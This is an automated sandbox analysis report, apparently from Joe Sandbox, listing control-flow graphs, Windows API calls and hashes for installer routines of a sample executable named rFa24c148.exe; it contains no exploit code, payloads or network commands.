                                                                                              control_flow_graph 534 401752-401777 call 402b3a call 405839 539 401781-401793 call 405d77 call 4057c2 lstrcatW 534->539 540 401779-40177f call 405d77 534->540 545 401798-401799 call 40600b 539->545 540->545 549 40179e-4017a2 545->549 550 4017a4-4017ae call 4060ba 549->550 551 4017d5-4017d8 549->551 559 4017c0-4017d2 550->559 560 4017b0-4017be CompareFileTime 550->560 552 4017e0-4017fc call 4059e3 551->552 553 4017da-4017db call 4059be 551->553 561 401870-401899 call 405021 call 402fa2 552->561 562 4017fe-401801 552->562 553->552 559->551 560->559 576 4018a1-4018ad SetFileTime 561->576 577 40189b-40189f 561->577 563 401852-40185c call 405021 562->563 564 401803-401841 call 405d77 * 2 call 405d99 call 405d77 call 405553 562->564 574 401865-40186b 563->574 564->549 597 401847-401848 564->597 579 4029d0 574->579 578 4018b3-4018be CloseHandle 576->578 577->576 577->578 581 4018c4-4018c7 578->581 582 4029c7-4029ca 578->582 583 4029d2-4029d6 579->583 585 4018c9-4018da call 405d99 lstrcatW 581->585 586 4018dc-4018df call 405d99 581->586 582->579 593 4018e4-402243 call 405553 585->593 586->593 593->583 597->574 599 40184a-40184b 597->599 599->563
                                                                                              APIs
                                                                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Program Files (x86)\shaw,?,?,00000031), ref: 00401793
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Program Files (x86)\shaw,?,?,00000031), ref: 004017B8
                                                                                                • Part of subcall function 00405D77: lstrcpynW.KERNEL32(?,?,00000400,0040326D,004281A0,NSIS Error), ref: 00405D84
                                                                                                • Part of subcall function 00405021: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,00000000,0040FE48,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 00405059
                                                                                                • Part of subcall function 00405021: lstrlenW.KERNEL32(004030DB,Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,00000000,0040FE48,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405069
                                                                                                • Part of subcall function 00405021: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,004030DB,004030DB,Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,00000000,0040FE48,00000000), ref: 0040507C
                                                                                                • Part of subcall function 00405021: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll), ref: 0040508E
                                                                                                • Part of subcall function 00405021: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050B4
                                                                                                • Part of subcall function 00405021: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050CE
                                                                                                • Part of subcall function 00405021: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                              • String ID: C:\Program Files (x86)\shaw$C:\Users\user\AppData\Local\Temp\nsnA538.tmp$C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll$Call
                                                                                              • API String ID: 1941528284-211454927
                                                                                              • Opcode ID: 69be8e2269a1f7a821158fec15adda67e81a6c57227f726c0035925acb367b04
                                                                                              • Instruction ID: f5340c52137ac8e05323c68babe13c17cc5cde59bf11d192bd930834dcc8acac
                                                                                              • Opcode Fuzzy Hash: 69be8e2269a1f7a821158fec15adda67e81a6c57227f726c0035925acb367b04
                                                                                              • Instruction Fuzzy Hash: C6419071900908BACF11BBB5CC46DAF7679EF05368F20863BF425B11E1D73C8A419A6E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 600 405021-405036 601 40503c-40504d 600->601 602 4050ed-4050f1 600->602 603 405058-405064 lstrlenW 601->603 604 40504f-405053 call 405d99 601->604 606 405081-405085 603->606 607 405066-405076 lstrlenW 603->607 604->603 609 405094-405098 606->609 610 405087-40508e SetWindowTextW 606->610 607->602 608 405078-40507c lstrcatW 607->608 608->606 611 40509a-4050dc SendMessageW * 3 609->611 612 4050de-4050e0 609->612 610->609 611->612 612->602 613 4050e2-4050e5 612->613 613->602
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,00000000,0040FE48,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 00405059
                                                                                              • lstrlenW.KERNEL32(004030DB,Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,00000000,0040FE48,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405069
                                                                                              • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,004030DB,004030DB,Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,00000000,0040FE48,00000000), ref: 0040507C
                                                                                              • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll), ref: 0040508E
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050B4
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050CE
                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 004050DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                              • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll
                                                                                              • API String ID: 2531174081-1434864346
                                                                                              • Opcode ID: be2a794c2a3455270d4b05c7547fa0c48c28aa5b6759893b99f6518c6e473265
                                                                                              • Instruction ID: 72d3c87754a4f2576c1daf3770cdfe6bbb79a9fd4797c08dd841ae8e1e27fedc
                                                                                              • Opcode Fuzzy Hash: be2a794c2a3455270d4b05c7547fa0c48c28aa5b6759893b99f6518c6e473265
                                                                                              • Instruction Fuzzy Hash: AE219D71900518BBCB219F95DD84ADFBFB9EF45350F14807AF904B62A0C3798A41CFA8

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 614 402fa2-402fb9 615 402fc2-402fca 614->615 616 402fbb 614->616 617 402fd1-402fd6 615->617 618 402fcc 615->618 616->615 619 402fe6-402ff3 call 40319e 617->619 620 402fd8-402fe1 call 4031b4 617->620 618->617 624 403149 619->624 625 402ff9-402ffd 619->625 620->619 628 40314b-40314c 624->628 626 403132-403134 625->626 627 403003-403023 GetTickCount call 4061fd 625->627 629 403136-403139 626->629 630 403189-40318d 626->630 638 403194 627->638 640 403029-403031 627->640 632 403197-40319b 628->632 635 40313b 629->635 636 40313e-403147 call 40319e 629->636 633 40314e-403154 630->633 634 40318f 630->634 641 403156 633->641 642 403159-403167 call 40319e 633->642 634->638 635->636 636->624 647 403191 636->647 638->632 644 403033 640->644 645 403036-403044 call 40319e 640->645 641->642 642->624 650 403169-40317c WriteFile 642->650 644->645 645->624 654 40304a-403053 645->654 647->638 652 40312e-403130 650->652 653 40317e-403181 650->653 652->628 653->652 655 403183-403186 653->655 656 403059-403076 call 40621d 654->656 655->630 659 40312a-40312c 656->659 660 40307c-403093 GetTickCount 656->660 659->628 661 403095-40309d 660->661 662 4030de-4030e2 660->662 663 4030a5-4030d6 MulDiv wsprintfW call 405021 661->663 664 40309f-4030a3 661->664 665 4030e4-4030e7 662->665 666 40311f-403122 662->666 671 4030db 663->671 664->662 664->663 669 403107-40310d 665->669 670 4030e9-4030fb WriteFile 665->670 666->640 667 403128 666->667 667->638 673 403113-403117 669->673 670->652 672 4030fd-403100 670->672 671->662 672->652 674 403102-403105 672->674 673->656 675 40311d 673->675 674->673 675->638
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00403003
                                                                                              • GetTickCount.KERNEL32 ref: 00403084
                                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004030B1
                                                                                              • wsprintfW.USER32 ref: 004030C4
                                                                                              • WriteFile.KERNELBASE(00000000,00000000,0040FE48,7FFFFFFF,00000000), ref: 004030F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$FileWritewsprintf
                                                                                              • String ID: ... %d%%
                                                                                              • API String ID: 4209647438-2449383134
                                                                                              • Opcode ID: 13d77005233b2c703e88a738dcd56f5575194dca18d803a30cab386bf45fddca
                                                                                              • Instruction ID: 2f3b8c8ab01821edfbb7561a0937ed23110cd7788458c70898d592dcb6d42ddc
                                                                                              • Opcode Fuzzy Hash: 13d77005233b2c703e88a738dcd56f5575194dca18d803a30cab386bf45fddca
                                                                                              • Instruction Fuzzy Hash: 8A516D31900219ABCF10DF65D944AAF7BACAF48756F10413BE910BB2C0D7389E51CBA9

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 676 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW 683 4029c7-4029d6 676->683 684 40237d-402385 676->684 686 402387-402394 call 402b3a lstrlenW 684->686 687 402398-40239b 684->687 686->687 688 4023ab-4023ae 687->688 689 40239d-4023aa call 402b1d 687->689 693 4023b0-4023ba call 402fa2 688->693 694 4023bf-4023d3 RegSetValueExW 688->694 689->688 693->694 698 4023d5 694->698 699 4023d8-4024b2 RegCloseKey 694->699 698->699 699->683 701 402793-40279a 699->701 701->683
                                                                                              APIs
                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsnA538.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsnA538.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnA538.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsnA538.tmp
                                                                                              • API String ID: 1356686001-3223593738
                                                                                              • Opcode ID: 60d0e40a1802c79bda5c7497f46e73a45a695d690e5e4760ff09b179a2f47946
                                                                                              • Instruction ID: ff9c26e96d548ba14907c7cf0d775baaea3cd420635c28ab46d49cad89ffe0f3
                                                                                              • Opcode Fuzzy Hash: 60d0e40a1802c79bda5c7497f46e73a45a695d690e5e4760ff09b179a2f47946
                                                                                              • Instruction Fuzzy Hash: 311181B1A00108BEEB10AFA4DD49EAF777CEB50358F10443AF905B61D0D7B85D409A29

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 702 4015b9-4015cd call 402b3a call 40586d 707 401614-401617 702->707 708 4015cf-4015eb call 4057ef CreateDirectoryW 702->708 709 401646-402197 call 401423 707->709 710 401619-401638 call 401423 call 405d77 SetCurrentDirectoryW 707->710 717 40160a-401612 708->717 718 4015ed-4015f8 GetLastError 708->718 724 402793-40279a 709->724 725 4029c7-4029d6 709->725 710->725 727 40163e-401641 710->727 717->707 717->708 721 401607 718->721 722 4015fa-401605 GetFileAttributesW 718->722 721->717 722->717 722->721 724->725 727->725
                                                                                              APIs
                                                                                                • Part of subcall function 0040586D: CharNextW.USER32(?,?,C:\,?,004058E1,C:\,C:\,?,?,74DF3420,0040561F,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\rFa24c148.exe"), ref: 0040587B
                                                                                                • Part of subcall function 0040586D: CharNextW.USER32(00000000), ref: 00405880
                                                                                                • Part of subcall function 0040586D: CharNextW.USER32(00000000), ref: 00405898
                                                                                              • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Program Files (x86)\shaw,?,00000000,000000F0), ref: 00401630
                                                                                              Strings
                                                                                              • C:\Program Files (x86)\shaw, xrefs: 00401623
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                              • String ID: C:\Program Files (x86)\shaw
                                                                                              • API String ID: 3751793516-209812835
                                                                                              • Opcode ID: 53cec99a44b5501f79705a11811158959523dda88924113c706af1bde306e0ba
                                                                                              • Instruction ID: f9b53a9290970587256920563605d3a8fa34613ebd87cabe797d0c7397107685
                                                                                              • Opcode Fuzzy Hash: 53cec99a44b5501f79705a11811158959523dda88924113c706af1bde306e0ba
                                                                                              • Instruction Fuzzy Hash: 9711C631904104EBCF206FA0DD449AE76B1EF14369F34493BF881B61E1D63D49419A5D

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 729 402b7a-402ba3 RegOpenKeyExW 730 402ba5-402bb0 729->730 731 402c0e-402c12 729->731 732 402bcb-402bdb RegEnumKeyW 730->732 733 402bb2-402bb5 732->733 734 402bdd-402bef RegCloseKey call 4060e1 732->734 735 402c02-402c05 RegCloseKey 733->735 736 402bb7-402bc9 call 402b7a 733->736 742 402bf1-402c00 734->742 743 402c15-402c1b 734->743 740 402c0b-402c0d 735->740 736->732 736->734 740->731 742->731 743->740 744 402c1d-402c2b RegDeleteKeyW 743->744 744->740 745 402c2d 744->745 745->731
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
